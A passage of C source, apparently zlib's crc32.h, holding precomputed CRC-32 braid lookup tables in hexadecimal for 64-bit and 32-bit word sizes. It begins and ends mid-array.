0x8e35a91a00000000, 0x5b87ffeb00000000, 0xfe54a32000000000, 0x502637a600000000, 0xf5f56b6d00000000, 0x4dc56e7000000000, 0xe81632bb00000000, 0x4664a63d00000000, 0xe3b7faf600000000, 0xad077a0400000000, 0x08d426cf00000000, 0xa6a6b24900000000, 0x0375ee8200000000, 0xbb45eb9f00000000, 0x1e96b75400000000, 0xb0e423d200000000, 0x15377f1900000000, 0xc08529e800000000, 0x6556752300000000, 0xcb24e1a500000000, 0x6ef7bd6e00000000, 0xd6c7b87300000000, 0x7314e4b800000000, 0xdd66703e00000000, 0x78b52cf500000000, 0x6c0a580f00000000, 0xc9d904c400000000, 0x67ab904200000000, 0xc278cc8900000000, 0x7a48c99400000000, 0xdf9b955f00000000, 0x71e901d900000000, 0xd43a5d1200000000, 0x01880be300000000, 0xa45b572800000000, 0x0a29c3ae00000000, 0xaffa9f6500000000, 0x17ca9a7800000000, 0xb219c6b300000000, 0x1c6b523500000000, 0xb9b80efe00000000, 0xf7088e0c00000000, 0x52dbd2c700000000, 0xfca9464100000000, 0x597a1a8a00000000, 0xe14a1f9700000000, 0x4499435c00000000, 0xeaebd7da00000000, 0x4f388b1100000000, 0x9a8adde000000000, 0x3f59812b00000000, 0x912b15ad00000000, 0x34f8496600000000, 0x8cc84c7b00000000, 0x291b10b000000000, 0x8769843600000000, 0x22bad8fd00000000, 0x5a0ff40800000000, 0xffdca8c300000000, 0x51ae3c4500000000, 0xf47d608e00000000, 0x4c4d659300000000, 0xe99e395800000000, 0x47ecadde00000000, 0xe23ff11500000000, 0x378da7e400000000, 0x925efb2f00000000, 0x3c2c6fa900000000, 0x99ff336200000000, 0x21cf367f00000000, 0x841c6ab400000000, 0x2a6efe3200000000, 0x8fbda2f900000000, 0xc10d220b00000000, 0x64de7ec000000000, 0xcaacea4600000000, 0x6f7fb68d00000000, 0xd74fb39000000000, 0x729cef5b00000000, 0xdcee7bdd00000000, 0x793d271600000000, 0xac8f71e700000000, 0x095c2d2c00000000, 0xa72eb9aa00000000, 0x02fde56100000000, 0xbacde07c00000000, 0x1f1ebcb700000000, 0xb16c283100000000, 0x14bf74fa00000000, 0xd814b01e00000000, 0x7dc7ecd500000000, 0xd3b5785300000000, 0x7666249800000000, 0xce56218500000000, 0x6b857d4e00000000, 0xc5f7e9c800000000, 0x6024b50300000000, 0xb596e3f200000000, 0x1045bf3900000000, 0xbe372bbf00000000, 0x1be4777400000000, 0xa3d4726900000000, 0x06072ea200000000, 0xa875ba2400000000, 0x0da6e6ef00000000, 0x4316661d00000000, 0xe6c53ad600000000, 0x48b7ae5000000000, 0xed64f29b00000000, 0x5554f78600000000, 0xf087ab4d00000000, 0x5ef53fcb00000000, 0xfb26630000000000, 0x2e9435f100000000, 0x8b47693a00000000, 0x2535fdbc00000000, 0x80e6a17700000000, 0x38d6a46a00000000, 0x9d05f8a100000000, 0x33776c2700000000, 0x96a430ec00000000, 0xee111c1900000000, 0x4bc240d200000000, 0xe5b0d45400000000, 0x4063889f00000000, 0xf8538d8200000000, 0x5d80d14900000000, 0xf3f245cf00000000, 0x5621190400000000, 0x83934ff500000000, 0x2640133e00000000, 0x883287b800000000, 0x2de1db7300000000, 0x95d1de6e00000000, 0x300282a500000000, 0x9e70162300000000, 0x3ba34ae800000000, 0x7513ca1a00000000, 0xd0c096d100000000, 0x7eb2025700000000, 0xdb615e9c00000000, 0x63515b8100000000, 0xc682074a00000000, 0x68f093cc00000000, 0xcd23cf0700000000, 0x189199f600000000, 0xbd42c53d00000000, 0x133051bb00000000, 0xb6e30d7000000000, 0x0ed3086d00000000, 0xab0054a600000000, 0x0572c02000000000, 0xa0a19ceb00000000, 0xb41ee81100000000, 0x11cdb4da00000000, 0xbfbf205c00000000, 0x1a6c7c9700000000, 0xa25c798a00000000, 0x078f254100000000, 0xa9fdb1c700000000, 0x0c2eed0c00000000, 0xd99cbbfd00000000, 0x7c4fe73600000000, 0xd23d73b000000000, 0x77ee2f7b00000000, 0xcfde2a6600000000, 0x6a0d76ad00000000, 0xc47fe22b00000000, 0x61acbee000000000, 0x2f1c3e1200000000, 0x8acf62d900000000, 0x24bdf65f00000000, 0x816eaa9400000000, 0x395eaf8900000000, 0x9c8df34200000000, 0x32ff67c400000000, 0x972c3b0f00000000, 0x429e6dfe00000000, 0xe74d313500000000, 0x493fa5b300000000, 0xececf97800000000, 0x54dcfc6500000000, 0xf10fa0ae00000000, 0x5f7d342800000000, 0xfaae68e300000000, 0x821b441600000000, 0x27c818dd00000000, 0x89ba8c5b00000000, 0x2c69d09000000000, 0x9459d58d00000000, 0x318a894600000000, 0x9ff81dc000000000, 0x3a2b410b00000000, 0xef9917fa00000000, 0x4a4a4b3100000000, 0xe438dfb700000000, 0x41eb837c00000000, 0xf9db866100000000, 0x5c08daaa00000000, 0xf27a4e2c00000000, 0x57a912e700000000, 0x1919921500000000, 0xbccacede00000000, 0x12b85a5800000000, 0xb76b069300000000, 0x0f5b038e00000000, 0xaa885f4500000000, 0x04facbc300000000, 0xa129970800000000, 0x749bc1f900000000, 0xd1489d3200000000, 0x7f3a09b400000000, 0xdae9557f00000000, 0x62d9506200000000, 0xc70a0ca900000000, 0x6978982f00000000, 0xccabc4e400000000}, {0x0000000000000000, 0xb40b77a600000000, 0x29119f9700000000, 0x9d1ae83100000000, 0x13244ff400000000, 0xa72f385200000000, 0x3a35d06300000000, 0x8e3ea7c500000000, 0x674eef3300000000, 0xd345989500000000, 0x4e5f70a400000000, 0xfa54070200000000, 0x746aa0c700000000, 0xc061d76100000000, 0x5d7b3f5000000000, 0xe97048f600000000, 0xce9cde6700000000, 0x7a97a9c100000000, 0xe78d41f000000000, 0x5386365600000000, 0xddb8919300000000, 0x69b3e63500000000, 0xf4a90e0400000000, 0x40a279a200000000, 0xa9d2315400000000, 0x1dd946f200000000, 0x80c3aec300000000, 0x34c8d96500000000, 0xbaf67ea000000000, 0x0efd090600000000, 0x93e7e13700000000, 0x27ec969100000000, 0x9c39bdcf00000000, 0x2832ca6900000000, 0xb528225800000000, 0x012355fe00000000, 0x8f1df23b00000000, 0x3b16859d00000000, 0xa60c6dac00000000, 0x12071a0a00000000, 0xfb7752fc00000000, 0x4f7c255a00000000, 0xd266cd6b00000000, 0x666dbacd00000000, 0xe8531d0800000000, 0x5c586aae00000000, 0xc142829f00000000, 0x7549f53900000000, 0x52a563a800000000, 0xe6ae140e00000000, 0x7bb4fc3f00000000, 0xcfbf8b9900000000, 0x41812c5c00000000, 0xf58a5bfa00000000, 0x6890b3cb00000000, 0xdc9bc46d00000000, 0x35eb8c9b00000000, 0x81e0fb3d00000000, 0x1cfa130c00000000, 0xa8f164aa00000000, 0x26cfc36f00000000, 0x92c4b4c900000000, 0x0fde5cf800000000, 0xbbd52b5e00000000, 0x79750b4400000000, 0xcd7e7ce200000000, 0x506494d300000000, 0xe46fe37500000000, 0x6a5144b000000000, 0xde5a331600000000, 0x4340db2700000000, 0xf74bac8100000000, 0x1e3be47700000000, 0xaa3093d100000000, 0x372a7be000000000, 0x83210c4600000000, 0x0d1fab8300000000, 0xb914dc2500000000, 0x240e341400000000, 0x900543b200000000, 0xb7e9d52300000000, 0x03e2a28500000000, 0x9ef84ab400000000, 0x2af33d1200000000, 0xa4cd9ad700000000, 0x10c6ed7100000000, 0x8ddc054000000000, 0x39d772e600000000, 0xd0a73a1000000000, 0x64ac4db600000000, 0xf9b6a58700000000, 0x4dbdd22100000000, 0xc38375e400000000, 0x7788024200000000, 0xea92ea7300000000, 0x5e999dd500000000, 0xe54cb68b00000000, 0x5147c12d00000000, 0xcc5d291c00000000, 0x78565eba00000000, 0xf668f97f00000000, 0x42638ed900000000, 0xdf7966e800000000, 0x6b72114e00000000, 0x820259b800000000, 0x36092e1e00000000, 0xab13c62f00000000, 0x1f18b18900000000, 0x9126164c00000000, 0x252d61ea00000000, 0xb83789db00000000, 0x0c3cfe7d00000000, 0x2bd068ec00000000, 0x9fdb1f4a00000000, 0x02c1f77b00000000, 0xb6ca80dd00000000, 0x38f4271800000000, 0x8cff50be00000000, 0x11e5b88f00000000, 0xa5eecf2900000000, 0x4c9e87df00000000, 0xf895f07900000000, 0x658f184800000000, 0xd1846fee00000000, 0x5fbac82b00000000, 0xebb1bf8d00000000, 0x76ab57bc00000000, 0xc2a0201a00000000, 0xf2ea168800000000, 0x46e1612e00000000, 0xdbfb891f00000000, 0x6ff0feb900000000, 0xe1ce597c00000000, 0x55c52eda00000000, 0xc8dfc6eb00000000, 0x7cd4b14d00000000, 0x95a4f9bb00000000, 0x21af8e1d00000000, 0xbcb5662c00000000, 0x08be118a00000000, 0x8680b64f00000000, 0x328bc1e900000000, 0xaf9129d800000000, 0x1b9a5e7e00000000, 0x3c76c8ef00000000, 0x887dbf4900000000, 0x1567577800000000, 0xa16c20de00000000, 0x2f52871b00000000, 0x9b59f0bd00000000, 0x0643188c00000000, 0xb2486f2a00000000, 0x5b3827dc00000000, 0xef33507a00000000, 0x7229b84b00000000, 0xc622cfed00000000, 0x481c682800000000, 0xfc171f8e00000000, 0x610df7bf00000000, 0xd506801900000000, 0x6ed3ab4700000000, 0xdad8dce100000000, 0x47c234d000000000, 0xf3c9437600000000, 0x7df7e4b300000000, 0xc9fc931500000000, 0x54e67b2400000000, 0xe0ed0c8200000000, 0x099d447400000000, 0xbd9633d200000000, 0x208cdbe300000000, 0x9487ac4500000000, 0x1ab90b8000000000, 0xaeb27c2600000000, 0x33a8941700000000, 0x87a3e3b100000000, 0xa04f752000000000, 0x1444028600000000, 0x895eeab700000000, 0x3d559d1100000000, 0xb36b3ad400000000, 0x07604d7200000000, 0x9a7aa54300000000, 0x2e71d2e500000000, 0xc7019a1300000000, 0x730aedb500000000, 0xee10058400000000, 0x5a1b722200000000, 0xd425d5e700000000, 0x602ea24100000000, 0xfd344a7000000000, 0x493f3dd600000000, 0x8b9f1dcc00000000, 0x3f946a6a00000000, 0xa28e825b00000000, 0x1685f5fd00000000, 0x98bb523800000000, 0x2cb0259e00000000, 0xb1aacdaf00000000, 0x05a1ba0900000000, 0xecd1f2ff00000000, 0x58da855900000000, 0xc5c06d6800000000, 0x71cb1ace00000000, 0xfff5bd0b00000000, 0x4bfecaad00000000, 0xd6e4229c00000000, 0x62ef553a00000000, 0x4503c3ab00000000, 0xf108b40d00000000, 0x6c125c3c00000000, 0xd8192b9a00000000, 0x56278c5f00000000, 0xe22cfbf900000000, 0x7f3613c800000000, 0xcb3d646e00000000, 0x224d2c9800000000, 0x96465b3e00000000, 0x0b5cb30f00000000, 0xbf57c4a900000000, 0x3169636c00000000, 0x856214ca00000000, 0x1878fcfb00000000, 0xac738b5d00000000, 0x17a6a00300000000, 0xa3add7a500000000, 0x3eb73f9400000000, 0x8abc483200000000, 0x0482eff700000000, 0xb089985100000000, 0x2d93706000000000, 0x999807c600000000, 0x70e84f3000000000, 0xc4e3389600000000, 0x59f9d0a700000000, 0xedf2a70100000000, 0x63cc00c400000000, 0xd7c7776200000000, 0x4add9f5300000000, 0xfed6e8f500000000, 0xd93a7e6400000000, 0x6d3109c200000000, 0xf02be1f300000000, 0x4420965500000000, 0xca1e319000000000, 0x7e15463600000000, 0xe30fae0700000000, 0x5704d9a100000000, 0xbe74915700000000, 0x0a7fe6f100000000, 0x97650ec000000000, 0x236e796600000000, 0xad50dea300000000, 0x195ba90500000000, 0x8441413400000000, 0x304a369200000000}, {0x0000000000000000, 0x9e00aacc00000000, 0x7d07254200000000, 0xe3078f8e00000000, 0xfa0e4a8400000000, 0x640ee04800000000, 0x87096fc600000000, 0x1909c50a00000000, 0xb51be5d300000000, 0x2b1b4f1f00000000, 0xc81cc09100000000, 0x561c6a5d00000000, 0x4f15af5700000000, 0xd115059b00000000, 0x32128a1500000000, 0xac1220d900000000, 0x2b31bb7c00000000, 0xb53111b000000000, 0x56369e3e00000000, 0xc83634f200000000, 0xd13ff1f800000000, 0x4f3f5b3400000000, 0xac38d4ba00000000, 0x32387e7600000000, 0x9e2a5eaf00000000, 0x002af46300000000, 0xe32d7bed00000000, 0x7d2dd12100000000, 0x6424142b00000000, 0xfa24bee700000000, 0x1923316900000000, 0x87239ba500000000, 0x566276f900000000, 0xc862dc3500000000, 0x2b6553bb00000000, 0xb565f97700000000, 0xac6c3c7d00000000, 0x326c96b100000000, 0xd16b193f00000000, 0x4f6bb3f300000000, 0xe379932a00000000, 0x7d7939e600000000, 0x9e7eb66800000000, 0x007e1ca400000000, 0x1977d9ae00000000, 0x8777736200000000, 0x6470fcec00000000, 0xfa70562000000000, 0x7d53cd8500000000, 0xe353674900000000, 0x0054e8c700000000, 0x9e54420b00000000, 0x875d870100000000, 0x195d2dcd00000000, 0xfa5aa24300000000, 0x645a088f00000000, 0xc848285600000000, 0x5648829a00000000, 0xb54f0d1400000000, 0x2b4fa7d800000000, 0x324662d200000000, 0xac46c81e00000000, 0x4f41479000000000, 0xd141ed5c00000000, 0xedc29d2900000000, 0x73c237e500000000, 0x90c5b86b00000000, 0x0ec512a700000000, 0x17ccd7ad00000000, 0x89cc7d6100000000, 0x6acbf2ef00000000, 0xf4cb582300000000, 0x58d978fa00000000, 0xc6d9d23600000000, 0x25de5db800000000, 0xbbdef77400000000, 0xa2d7327e00000000, 0x3cd798b200000000, 0xdfd0173c00000000, 0x41d0bdf000000000, 0xc6f3265500000000, 0x58f38c9900000000, 0xbbf4031700000000, 0x25f4a9db00000000, 0x3cfd6cd100000000, 0xa2fdc61d00000000, 0x41fa499300000000, 0xdffae35f00000000, 0x73e8c38600000000, 0xede8694a00000000, 0x0eefe6c400000000, 0x90ef4c0800000000, 0x89e6890200000000, 0x17e623ce00000000, 0xf4e1ac4000000000, 0x6ae1068c00000000, 0xbba0ebd000000000, 0x25a0411c00000000, 0xc6a7ce9200000000, 0x58a7645e00000000, 0x41aea15400000000, 0xdfae0b9800000000, 0x3ca9841600000000, 0xa2a92eda00000000, 0x0ebb0e0300000000, 0x90bba4cf00000000, 0x73bc2b4100000000, 0xedbc818d00000000, 0xf4b5448700000000, 0x6ab5ee4b00000000, 0x89b261c500000000, 0x17b2cb0900000000, 0x909150ac00000000, 0x0e91fa6000000000, 0xed9675ee00000000, 0x7396df2200000000, 0x6a9f1a2800000000, 0xf49fb0e400000000, 0x17983f6a00000000, 0x899895a600000000, 0x258ab57f00000000, 0xbb8a1fb300000000, 0x588d903d00000000, 0xc68d3af100000000, 0xdf84fffb00000000, 0x4184553700000000, 0xa283dab900000000, 0x3c83707500000000, 0xda853b5300000000, 0x4485919f00000000, 0xa7821e1100000000, 0x3982b4dd00000000, 0x208b71d700000000, 0xbe8bdb1b00000000, 0x5d8c549500000000, 0xc38cfe5900000000, 0x6f9ede8000000000, 0xf19e744c00000000, 0x1299fbc200000000, 0x8c99510e00000000, 0x9590940400000000, 0x0b903ec800000000, 0xe897b14600000000, 0x76971b8a00000000, 0xf1b4802f00000000, 0x6fb42ae300000000, 0x8cb3a56d00000000, 0x12b30fa100000000, 0x0bbacaab00000000, 0x95ba606700000000, 0x76bdefe900000000, 0xe8bd452500000000, 0x44af65fc00000000, 0xdaafcf3000000000, 0x39a840be00000000, 0xa7a8ea7200000000, 0xbea12f7800000000, 0x20a185b400000000, 0xc3a60a3a00000000, 0x5da6a0f600000000, 0x8ce74daa00000000, 0x12e7e76600000000, 0xf1e068e800000000, 0x6fe0c22400000000, 0x76e9072e00000000, 0xe8e9ade200000000, 0x0bee226c00000000, 0x95ee88a000000000, 0x39fca87900000000, 0xa7fc02b500000000, 0x44fb8d3b00000000, 0xdafb27f700000000, 0xc3f2e2fd00000000, 0x5df2483100000000, 0xbef5c7bf00000000, 0x20f56d7300000000, 0xa7d6f6d600000000, 0x39d65c1a00000000, 0xdad1d39400000000, 0x44d1795800000000, 0x5dd8bc5200000000, 0xc3d8169e00000000, 0x20df991000000000, 0xbedf33dc00000000, 0x12cd130500000000, 0x8ccdb9c900000000, 0x6fca364700000000, 0xf1ca9c8b00000000, 0xe8c3598100000000, 0x76c3f34d00000000, 0x95c47cc300000000, 0x0bc4d60f00000000, 0x3747a67a00000000, 0xa9470cb600000000, 0x4a40833800000000, 0xd44029f400000000, 0xcd49ecfe00000000, 0x5349463200000000, 0xb04ec9bc00000000, 0x2e4e637000000000, 0x825c43a900000000, 0x1c5ce96500000000, 0xff5b66eb00000000, 0x615bcc2700000000, 0x7852092d00000000, 0xe652a3e100000000, 0x05552c6f00000000, 0x9b5586a300000000, 0x1c761d0600000000, 0x8276b7ca00000000, 0x6171384400000000, 0xff71928800000000, 0xe678578200000000, 0x7878fd4e00000000, 0x9b7f72c000000000, 0x057fd80c00000000, 0xa96df8d500000000, 0x376d521900000000, 0xd46add9700000000, 0x4a6a775b00000000, 0x5363b25100000000, 0xcd63189d00000000, 0x2e64971300000000, 0xb0643ddf00000000, 0x6125d08300000000, 0xff257a4f00000000, 0x1c22f5c100000000, 0x82225f0d00000000, 0x9b2b9a0700000000, 0x052b30cb00000000, 0xe62cbf4500000000, 0x782c158900000000, 0xd43e355000000000, 0x4a3e9f9c00000000, 0xa939101200000000, 0x3739bade00000000, 0x2e307fd400000000, 0xb030d51800000000, 0x53375a9600000000, 0xcd37f05a00000000, 0x4a146bff00000000, 0xd414c13300000000, 0x37134ebd00000000, 0xa913e47100000000, 0xb01a217b00000000, 0x2e1a8bb700000000, 0xcd1d043900000000, 0x531daef500000000, 0xff0f8e2c00000000, 0x610f24e000000000, 0x8208ab6e00000000, 0x1c0801a200000000, 0x0501c4a800000000, 0x9b016e6400000000, 0x7806e1ea00000000, 0xe6064b2600000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xb8bc6765, 0xaa09c88b, 0x12b5afee, 0x8f629757, 0x37def032, 0x256b5fdc, 0x9dd738b9, 0xc5b428ef, 0x7d084f8a, 0x6fbde064, 0xd7018701, 0x4ad6bfb8, 0xf26ad8dd, 0xe0df7733, 0x58631056, 0x5019579f, 0xe8a530fa, 0xfa109f14, 0x42acf871, 0xdf7bc0c8, 0x67c7a7ad, 0x75720843, 0xcdce6f26, 0x95ad7f70, 0x2d111815, 0x3fa4b7fb, 0x8718d09e, 0x1acfe827, 0xa2738f42, 0xb0c620ac, 0x087a47c9, 0xa032af3e, 0x188ec85b, 0x0a3b67b5, 0xb28700d0, 0x2f503869, 0x97ec5f0c, 0x8559f0e2, 0x3de59787, 0x658687d1, 0xdd3ae0b4, 0xcf8f4f5a, 0x7733283f, 0xeae41086, 0x525877e3, 0x40edd80d, 0xf851bf68, 0xf02bf8a1, 0x48979fc4, 0x5a22302a, 0xe29e574f, 0x7f496ff6, 0xc7f50893, 0xd540a77d, 0x6dfcc018, 0x359fd04e, 0x8d23b72b, 0x9f9618c5, 0x272a7fa0, 0xbafd4719, 0x0241207c, 0x10f48f92, 0xa848e8f7, 0x9b14583d, 0x23a83f58, 0x311d90b6, 0x89a1f7d3, 0x1476cf6a, 0xaccaa80f, 0xbe7f07e1, 0x06c36084, 0x5ea070d2, 0xe61c17b7, 0xf4a9b859, 0x4c15df3c, 0xd1c2e785, 0x697e80e0, 0x7bcb2f0e, 0xc377486b, 0xcb0d0fa2, 0x73b168c7, 0x6104c729, 0xd9b8a04c, 0x446f98f5, 0xfcd3ff90, 0xee66507e, 0x56da371b, 0x0eb9274d, 0xb6054028, 0xa4b0efc6, 0x1c0c88a3, 0x81dbb01a, 0x3967d77f, 0x2bd27891, 0x936e1ff4, 0x3b26f703, 0x839a9066, 0x912f3f88, 0x299358ed, 0xb4446054, 0x0cf80731, 0x1e4da8df, 0xa6f1cfba, 0xfe92dfec, 0x462eb889, 0x549b1767, 0xec277002, 0x71f048bb, 0xc94c2fde, 0xdbf98030, 0x6345e755, 0x6b3fa09c, 0xd383c7f9, 0xc1366817, 0x798a0f72, 0xe45d37cb, 0x5ce150ae, 0x4e54ff40, 0xf6e89825, 0xae8b8873, 0x1637ef16, 0x048240f8, 0xbc3e279d, 0x21e91f24, 0x99557841, 0x8be0d7af, 0x335cb0ca, 0xed59b63b, 0x55e5d15e, 0x47507eb0, 0xffec19d5, 0x623b216c, 0xda874609, 0xc832e9e7, 0x708e8e82, 0x28ed9ed4, 0x9051f9b1, 0x82e4565f, 0x3a58313a, 0xa78f0983, 0x1f336ee6, 0x0d86c108, 0xb53aa66d, 0xbd40e1a4, 0x05fc86c1, 0x1749292f, 0xaff54e4a, 0x322276f3, 0x8a9e1196, 0x982bbe78, 0x2097d91d, 0x78f4c94b, 0xc048ae2e, 0xd2fd01c0, 0x6a4166a5, 0xf7965e1c, 0x4f2a3979, 0x5d9f9697, 0xe523f1f2, 0x4d6b1905, 0xf5d77e60, 0xe762d18e, 0x5fdeb6eb, 0xc2098e52, 0x7ab5e937, 0x680046d9, 0xd0bc21bc, 0x88df31ea, 0x3063568f, 0x22d6f961, 0x9a6a9e04, 0x07bda6bd, 0xbf01c1d8, 0xadb46e36, 0x15080953, 0x1d724e9a, 0xa5ce29ff, 0xb77b8611, 0x0fc7e174, 0x9210d9cd, 0x2aacbea8, 0x38191146, 0x80a57623, 0xd8c66675, 0x607a0110, 0x72cfaefe, 0xca73c99b, 0x57a4f122, 0xef189647, 0xfdad39a9, 0x45115ecc, 0x764dee06, 0xcef18963, 0xdc44268d, 0x64f841e8, 0xf92f7951, 0x41931e34, 0x5326b1da, 0xeb9ad6bf, 0xb3f9c6e9, 0x0b45a18c, 0x19f00e62, 0xa14c6907, 0x3c9b51be, 0x842736db, 0x96929935, 0x2e2efe50, 0x2654b999, 0x9ee8defc, 0x8c5d7112, 0x34e11677, 0xa9362ece, 0x118a49ab, 0x033fe645, 0xbb838120, 0xe3e09176, 0x5b5cf613, 0x49e959fd, 0xf1553e98, 0x6c820621, 0xd43e6144, 0xc68bceaa, 0x7e37a9cf, 0xd67f4138, 0x6ec3265d, 0x7c7689b3, 0xc4caeed6, 0x591dd66f, 0xe1a1b10a, 0xf3141ee4, 0x4ba87981, 0x13cb69d7, 0xab770eb2, 0xb9c2a15c, 0x017ec639, 0x9ca9fe80, 0x241599e5, 0x36a0360b, 0x8e1c516e, 0x866616a7, 0x3eda71c2, 0x2c6fde2c, 0x94d3b949, 0x090481f0, 0xb1b8e695, 0xa30d497b, 0x1bb12e1e, 0x43d23e48, 0xfb6e592d, 0xe9dbf6c3, 0x516791a6, 0xccb0a91f, 0x740cce7a, 0x66b96194, 0xde0506f1}, {0x00000000, 0x01c26a37, 0x0384d46e, 0x0246be59, 0x0709a8dc, 0x06cbc2eb, 0x048d7cb2, 0x054f1685, 0x0e1351b8, 0x0fd13b8f, 0x0d9785d6, 0x0c55efe1, 0x091af964, 0x08d89353, 0x0a9e2d0a, 0x0b5c473d, 0x1c26a370, 0x1de4c947, 0x1fa2771e, 0x1e601d29, 0x1b2f0bac, 0x1aed619b, 0x18abdfc2, 0x1969b5f5, 0x1235f2c8, 0x13f798ff, 0x11b126a6, 0x10734c91, 0x153c5a14, 0x14fe3023, 0x16b88e7a, 0x177ae44d, 0x384d46e0, 0x398f2cd7, 0x3bc9928e, 0x3a0bf8b9, 0x3f44ee3c, 0x3e86840b, 0x3cc03a52, 0x3d025065, 0x365e1758, 0x379c7d6f, 0x35dac336, 0x3418a901, 0x3157bf84, 0x3095d5b3, 0x32d36bea, 0x331101dd, 0x246be590, 0x25a98fa7, 0x27ef31fe, 0x262d5bc9, 0x23624d4c, 0x22a0277b, 0x20e69922, 0x2124f315, 0x2a78b428, 0x2bbade1f, 0x29fc6046, 0x283e0a71, 0x2d711cf4, 0x2cb376c3, 0x2ef5c89a, 0x2f37a2ad, 0x709a8dc0, 0x7158e7f7, 0x731e59ae, 0x72dc3399, 0x7793251c, 0x76514f2b, 0x7417f172, 0x75d59b45, 0x7e89dc78, 0x7f4bb64f, 0x7d0d0816, 0x7ccf6221, 0x798074a4, 0x78421e93, 0x7a04a0ca, 0x7bc6cafd, 0x6cbc2eb0, 0x6d7e4487, 0x6f38fade, 0x6efa90e9, 0x6bb5866c, 0x6a77ec5b, 0x68315202, 0x69f33835, 0x62af7f08, 0x636d153f, 0x612bab66, 0x60e9c151, 0x65a6d7d4, 0x6464bde3, 0x662203ba, 0x67e0698d, 0x48d7cb20, 0x4915a117, 0x4b531f4e, 0x4a917579, 0x4fde63fc, 0x4e1c09cb, 0x4c5ab792, 0x4d98dda5, 0x46c49a98, 0x4706f0af, 0x45404ef6, 0x448224c1, 0x41cd3244, 0x400f5873, 0x4249e62a, 0x438b8c1d, 0x54f16850, 0x55330267, 0x5775bc3e, 0x56b7d609, 0x53f8c08c, 0x523aaabb, 0x507c14e2, 0x51be7ed5, 0x5ae239e8, 0x5b2053df, 0x5966ed86, 0x58a487b1, 0x5deb9134, 0x5c29fb03, 0x5e6f455a, 0x5fad2f6d, 0xe1351b80, 0xe0f771b7, 0xe2b1cfee, 0xe373a5d9, 0xe63cb35c, 0xe7fed96b, 0xe5b86732, 0xe47a0d05, 0xef264a38, 0xeee4200f, 0xeca29e56, 0xed60f461, 0xe82fe2e4, 0xe9ed88d3, 0xebab368a, 0xea695cbd, 0xfd13b8f0, 0xfcd1d2c7, 0xfe976c9e, 0xff5506a9, 0xfa1a102c, 0xfbd87a1b, 0xf99ec442, 0xf85cae75, 0xf300e948, 0xf2c2837f, 0xf0843d26, 0xf1465711, 0xf4094194, 0xf5cb2ba3, 0xf78d95fa, 0xf64fffcd, 0xd9785d60, 0xd8ba3757, 0xdafc890e, 0xdb3ee339, 0xde71f5bc, 0xdfb39f8b, 0xddf521d2, 0xdc374be5, 0xd76b0cd8, 0xd6a966ef, 0xd4efd8b6, 0xd52db281, 0xd062a404, 0xd1a0ce33, 0xd3e6706a, 0xd2241a5d, 0xc55efe10, 0xc49c9427, 0xc6da2a7e, 0xc7184049, 0xc25756cc, 0xc3953cfb, 0xc1d382a2, 0xc011e895, 0xcb4dafa8, 0xca8fc59f, 0xc8c97bc6, 0xc90b11f1, 0xcc440774, 0xcd866d43, 0xcfc0d31a, 0xce02b92d, 0x91af9640, 0x906dfc77, 0x922b422e, 0x93e92819, 0x96a63e9c, 0x976454ab, 0x9522eaf2, 0x94e080c5, 0x9fbcc7f8, 0x9e7eadcf, 0x9c381396, 0x9dfa79a1, 0x98b56f24, 0x99770513, 0x9b31bb4a, 0x9af3d17d, 0x8d893530, 0x8c4b5f07, 0x8e0de15e, 0x8fcf8b69, 0x8a809dec, 0x8b42f7db, 0x89044982, 0x88c623b5, 0x839a6488, 0x82580ebf, 0x801eb0e6, 0x81dcdad1, 0x8493cc54, 0x8551a663, 0x8717183a, 0x86d5720d, 0xa9e2d0a0, 0xa820ba97, 0xaa6604ce, 0xaba46ef9, 0xaeeb787c, 0xaf29124b, 0xad6fac12, 0xacadc625, 0xa7f18118, 0xa633eb2f, 0xa4755576, 0xa5b73f41, 0xa0f829c4, 0xa13a43f3, 0xa37cfdaa, 0xa2be979d, 0xb5c473d0, 0xb40619e7, 0xb640a7be, 0xb782cd89, 0xb2cddb0c, 0xb30fb13b, 0xb1490f62, 0xb08b6555, 0xbbd72268, 0xba15485f, 0xb853f606, 0xb9919c31, 0xbcde8ab4, 0xbd1ce083, 0xbf5a5eda, 0xbe9834ed}, {0x00000000, 0x191b3141, 0x32366282, 0x2b2d53c3, 0x646cc504, 0x7d77f445, 0x565aa786, 0x4f4196c7, 0xc8d98a08, 0xd1c2bb49, 0xfaefe88a, 0xe3f4d9cb, 0xacb54f0c, 0xb5ae7e4d, 0x9e832d8e, 0x87981ccf, 0x4ac21251, 0x53d92310, 0x78f470d3, 0x61ef4192, 0x2eaed755, 0x37b5e614, 0x1c98b5d7, 0x05838496, 0x821b9859, 0x9b00a918, 0xb02dfadb, 0xa936cb9a, 0xe6775d5d, 0xff6c6c1c, 0xd4413fdf, 0xcd5a0e9e, 0x958424a2, 0x8c9f15e3, 0xa7b24620, 0xbea97761, 0xf1e8e1a6, 0xe8f3d0e7, 0xc3de8324, 0xdac5b265, 0x5d5daeaa, 0x44469feb, 0x6f6bcc28, 0x7670fd69, 0x39316bae, 0x202a5aef, 0x0b07092c, 0x121c386d, 0xdf4636f3, 0xc65d07b2, 0xed705471, 0xf46b6530, 0xbb2af3f7, 0xa231c2b6, 0x891c9175, 0x9007a034, 0x179fbcfb, 0x0e848dba, 0x25a9de79, 0x3cb2ef38, 0x73f379ff, 0x6ae848be, 0x41c51b7d, 0x58de2a3c, 0xf0794f05, 0xe9627e44, 0xc24f2d87, 0xdb541cc6, 0x94158a01, 0x8d0ebb40, 0xa623e883, 0xbf38d9c2, 0x38a0c50d, 0x21bbf44c, 0x0a96a78f, 0x138d96ce, 0x5ccc0009, 0x45d73148, 0x6efa628b, 0x77e153ca, 0xbabb5d54, 0xa3a06c15, 0x888d3fd6, 0x91960e97, 0xded79850, 0xc7cca911, 0xece1fad2, 0xf5facb93, 0x7262d75c, 0x6b79e61d, 0x4054b5de, 0x594f849f, 0x160e1258, 0x0f152319, 0x243870da, 0x3d23419b, 0x65fd6ba7, 0x7ce65ae6, 0x57cb0925, 0x4ed03864, 0x0191aea3, 0x188a9fe2, 0x33a7cc21, 0x2abcfd60, 0xad24e1af, 0xb43fd0ee, 0x9f12832d, 0x8609b26c, 0xc94824ab, 0xd05315ea, 0xfb7e4629, 0xe2657768, 0x2f3f79f6, 0x362448b7, 0x1d091b74, 0x04122a35, 0x4b53bcf2, 0x52488db3, 0x7965de70, 0x607eef31, 0xe7e6f3fe, 0xfefdc2bf, 0xd5d0917c, 0xcccba03d, 0x838a36fa, 0x9a9107bb, 0xb1bc5478, 0xa8a76539, 0x3b83984b, 0x2298a90a, 0x09b5fac9, 0x10aecb88, 0x5fef5d4f, 0x46f46c0e, 0x6dd93fcd, 0x74c20e8c, 